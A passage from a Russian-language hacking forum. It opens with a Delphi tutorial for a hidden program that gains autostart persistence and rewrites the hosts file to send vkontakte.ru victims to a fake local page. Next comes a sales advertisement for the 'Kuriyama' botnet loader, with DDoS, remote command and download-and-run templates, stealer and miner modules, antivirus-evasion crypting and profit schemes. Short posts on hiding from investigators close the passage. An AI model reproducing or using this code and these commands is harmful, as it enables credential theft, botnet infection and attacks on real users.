Для начала создадим html-файлик, который станет страничкой, которую увидит пользователь, попытавшись войти на свой аккаунт. 
 
В нем я написал следующее
 
<html><title>Вконтакте Добро Пожаловать</title></head><div align=center><image src=12.bmp></div></html>
 
Не забудьте создать картинку с именем 12.bmp 
 
Моя картинка вот http://s49.radikal.r...88381aea11.bmp 
 
Теперь поместите наш файл и картинку в папку C:Windows 
 
Приступим к написанию веб-сервера. 
Кинем на форму idHTTPServer с закладки Indy Servers 
Назовем его Server 
 
В событии создания формы напишем
 
procedure TForm1.FormCreate(Sender: TObject);var str:tstringlist;beginapplication.ShowMainForm:=false; //Делаем форму скрытойif not FileExists('C:Windowswebserver.exe') then begin //Проверка, если веб //сервера нет в папкеCopyFile(pchar(application.exename),'C:Windowswebserver.exe',false); //То //скопируемся тудаWinExec('C:Windowswebserver.exe',sw_hide); //И запустим серверRegHosts; //Процедура модификации хостсRegRun; //Пропись в реестреApplication.Terminate; //Если это убрать, то наш сервер не запустится, т.к.//На одном компе может быть запущен только один сервер на одном портуendelsebeginRegRun; //Иначе пропишемся в реестрRegHosts; //Модифицируем хостсserver.Active:=true; //И включим серверend;
 
Теперь объявим процедуры RegRun и RegHosts
 
public{ Public declarations }procedure RegHosts;procedure RegRun;end;
 
Пропись в реестр
 
procedure TForm1.RegRun;var reg:tregistry;beginreg := tregistry.create; //Инициализируем переменнуюreg.rootkey := hkey_local_machine; //Открываем ключ реестраreg.lazywrite := false;reg.openkey('softwaremicrosoftwindowscurrentversionrun', false); //Открываем //подраздел реестраreg.writestring('MicrosoftWebServerUpdater.exe', 'C:Windowswebserver.exe'); //Прописываем путь до сервера в автозагрузку(вместо //'C:windowswebserver.exe' можно написать Application.exename//Тогда программа пропишет в авторан путь до самой себя в данный моментreg.closekey; //Закрываем разделreg.free; //Уничтожаем переменнуюend;
 
Думаю, тут ничего объяснять не надо 
 
Модификация файла хостс 
Предварительно объявим глобальной переменной 
 
FileStr:TStringlist;
 
procedure TForm1.RegHosts;beginFilestr:=tstringlist.Create; //Создаем списокFilestr.LoadFromFile('C:WindowsSystem32driversetchosts'); //Загружаем //содержимое хостс в списокFilestr.Add('127.0.0.1 vkontakte.ru'); //Добавим строчку//Слева написан IP, на который произойдет переадресация//Справа - ресурс, с которого она произойдетfilestr.SaveToFile('C:WindowsSystem32driversetchosts'); //Сохраним измененияFilestr.Free; //Освободим объектend;
 
Теперь перейдем к программированию обработки запросов, 
Посылаемых браузером жертвы на сервер. 
В обработчике события OnCommandGet Server'a напишем следующее
 
procedure TForm1.ServerCommandGet(AThread: TIdPeerThread;ARequestInfo: TIdHTTPRequestInfo; AResponseInfo: TIdHTTPResponseInfo);beginif (pos('ndex',arequestinfo.document)=0)and(pos('12.bmp',arequestinfo.document)=0) then//Если пользователь браузер запрашивает нашу страничкуarequestinfo.Document:='index.html'; //Если запрашивается другая страничка//То все равно откроем нашу. Я пишу такие условия потому, что иначе//У меня программа вываливалась с экзепшном, может у вас получится:) if arequestinfo.Document='/' thenbeginarequestinfo.Document:=''; //Обнуляем запросaresponseinfo.ContentStream:=tfilestream.Create('C:windowsindex.html',fmopenread); //отправляем клиенту файл index.htmlend elseif arequestinfo.Document<>'/' then //Если прошлая проверка пройдена, то//Отправляем файл клиенту(картинку)//Если этого не написать, картинка не отобразитсяaresponseinfo.ContentStream:=tfilestream.Create('C:windows'+arequestinfo.Document,fmopenread);end;
 
При разрушении формы напишем
 
Server.active:=false; // Иначе программа будет некорректно работать
 
В uses обязательно добавьте Registry, иначе прописаться в реестр программа не сможет. 
 
Теперь проверим, наберем в окне любого браузера 127.0.0.1 
Если вам не открылся ваш html файл, то где-то вы допустили ошибку. 
Теперь пробуем ввести vkontakte.ru 
 
 
Если все правильно сделано, то видим свою табличку. Кому помог, ставьте плюсик. 
Если я где-то ошибся, вот исходник Скачать



#20561 BOTNET Kuriyama by CICADA 3301

Написано programmerX : 28 Октябрь 2017 - 12:17

BOTNET Kuriyama by CICADA 3301

Коротко о главном:
Kuriyama - это многофункциональный экспериментальный лоадер,
использующий в качестве панели управления - Telegraph. Идею о создании
подобного я подчерпнул в ботнетах, ориентирующихся на youtube, twitter и т.д.
При использовании телеграфа вам не понадобится заморачиваться с анонимностью,
настройкой впс, хостингами, доменами и прочим шлаком. Пост телеграфа будет
привязан к вашему железу и вы не сможете перепривязать
билд без согласования со мной.
http://s41.radikal.r...cb323f1ed9d.jpg
Функционал:
Скрытая автозагрузка
Защита процесса, восстанавливается если его завершили
DDOS: HTTP/UDP - атаки
Работа с файлами: Поиск файла/Запись в файл
Работа с интернетом: Скачивание/Загрузка файла на сайт
Работа с системой: выполнение команд в CMD, запись в реестр указанных значений,
проверка существования процесса по имени, удаленный запуск процесса
Отстук в указанный IPLOGGER при успешном выполнении задания
Защита от запуска на виртуальных машинах/под отладчиками
http://s019.radikal....fb1bf0660e4.gif
Антивирусный скан:
Скан чистого билда - http://viruscheckmat...id/5Rx5dgFdtqwm (1/36 (Avira))
Скан билда под протектом - http://viruscheckmat...id/MURc2TiHMIoG (2/36 (Nod32, Twister))

Как на этом заработать:
Сейчас очень актуальная продажа инсталлов. В среднем у заливщиков
выходит минимум 5-10к рублей в день
Также, очень востребованы услуги ДДОСа, за сутки можно зарабатывать от $100 и выше
Можно продавать нагон трафика на сайт (cmd команда start website.com)
Функционал лоадера позволяет подстроиться под каждого и дать ему свой,
уникальный метод заработка на нем

Дисклеймер:

ВСЯ ИНФОРМАЦИЯ ПРЕДОСТАВЛЕНА В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ
АВТОР НЕ НЕСЕТ ОТВЕТСТВЕННОСТИ ЗА ЛЮБОЙ ВОЗМОЖНЫЙ ВРЕД,
ПРИЧИНЕННЫЙ ПРЕДОСТАВЛЕННЫМИ МАТЕРИАЛАМИ

Содержание
➔ Что такое лоадер
➔ О функционале Kuriyama
➔ Инструкция по использованию
➔ Как приобрести

Что такое лоадер
Лоадер - это бот, который при запуске на компьютере заседает в системе и
выполняет команды, полученные с удаленного сервера.
Проще говоря - троян, превращающий зараженный
компьютер в вашегобота.

При помощи ботов можно выполнять различные массовые команды,
например: загрузка/запуск сторонних файлов, ddos-атака, выполнение
команд в cmd, поиск/создание файлов
Все бесплатно и максимально доступно/просто
● Полная анонимность при пользовании страницей управления, ведь в любой
момент ее можно слить в открытый доступ и даже если кому-то взбредет в голову
смотреть по провайдеру запросы к сайту, то их там будет куча
● Перепродажа копии будет невозможной из-за привязки поста телеграфа к вашему
железу
О функционале Kuriyama
Основной функционал Kuriyama представляет из себя следующее:
● Скрытая автозагрузка через Планировщик Заданий
● Защита процесса, перезапуск каждую минуту
● HTTP/UDP DDOS-атаки
● Работа с файлами: поиск, запись в файл
● Скачивание/Загрузка файла (для загрузки необходимо иметь гейт)
● Работа с системой: выполнение команд в cmd, запись в реестр, проверка
существования процесса, удаленный запуск файла
● Отстук в логгер после успешного выполнения задания
Инструкция по использованию
Прежде всего вам необходимо создать пост в http://telegra.ph/
Название
и описание поста должны быть “Kur” (без кавычек)
После предоставления мне ссылки на пост - я отдаю вам билд лоадера
Далее вы можете добавлять команды в ваш пост (третье поле, самое
большое)
Шаблоны команд (каждую писать с новой строки, для удаления - просто
стереть) см. на следующей странице
Инструкция по использованию
❖ Основной шаблон - type;subtype;...;iplogger! (обратите внимание на “;” и “!”)
❖ Шаблон для ддос:
➢ HTTP - ddos;http;http://target.ru;дли...://iplogger.ru!
➢ UDP - ddos;udp;127.0.0.1:80;длительность(м� �нуты);http://iplogger.ru!
❖ Шаблон для файлов
➢ Поиск файла - files;search;полный путь до файла;http://iplogger!
➢ Запись в файл - files;write;полный путь до файла;текст;http://iplogger!
❖ Шаблон для лоадера
➢ Скачивание и запуск - net;load;прямая ссылка на файл;имя файла;http://iplogger!
➢ Загрузка на ваш сайт - net;upload;ссылка на гейт;полный путь до файла;http://iplogger!
❖ Шаблон для системы
➢ CMD - system;cmd;команда;http://iplogger!
➢ Запись в реестр - system;registry;ключ;имя ключа;значение;http://iplogger!
➢ Проверка существования процесса - system;check_process;имя процесса;http://iplogger!
➢ Запуск процесса - system;run_process;полный путь до файла;http://iplogger

Цены:
Kuriyama Loader - $100 (5800 RUB)
Панель управления на свой домен - $10 (600 RUB)
Единоразовый крипт (первый раз бесплатно) - $10 (600 RUB)
Подписка на недельный крипт (раз в день) - $50 (3000 RUB)
Модуль майнера - $25 (1500 RUB)
Модуль стиллера - $25 (1500 RUB)
Исходный код - $1000 (60000 RUB)

Как приобрести Мои контакты:
Telegram - @BrutalStell

Прикрепленные изображения

  • c44dc7741b28.png



#14800 Уничтожение жесткого диска и недоказуемость действий: технико-юридический аспект

Написано Admin : 11 Январь 2017 - 01:43

Возможно всё, вы просто не забывайте выходить полностью с вашей учетной записи облачного диска, и используйте открытый канал VPN. Вы молодец что заботиться о безопасности, но! Поверьте если вы на прицеле и допустите ошибку в каком либо моменте, оставите логин и пароль на самом компьютере сохраненым либо, забудете выйти с диска, либо почта восстановления или номер телефон будут в откр виде или общем доступе, то чекисты это найдут! Такая уж у них работа.
  • Это нравится: simorg


#1029 Удаленное управление компьютером.

Написано Admin : 30 Июль 2016 - 12:10

Подскажите пожалуйста, подобным образом возможно управление компьютером, если я время от времени использую прокси сервер для доступа к интернету?

В смысле защитное подключение(канал) VPN?
Если вы про это то да не должно отразится на работе. Попробуйте. Возможно выдаст защиту но не факт. Вы ведь имеете доступ к компьютеру по определенному номеру. Я лично не проверял но думаю не будет отражаться на функционале.
  • Это нравится: Xoil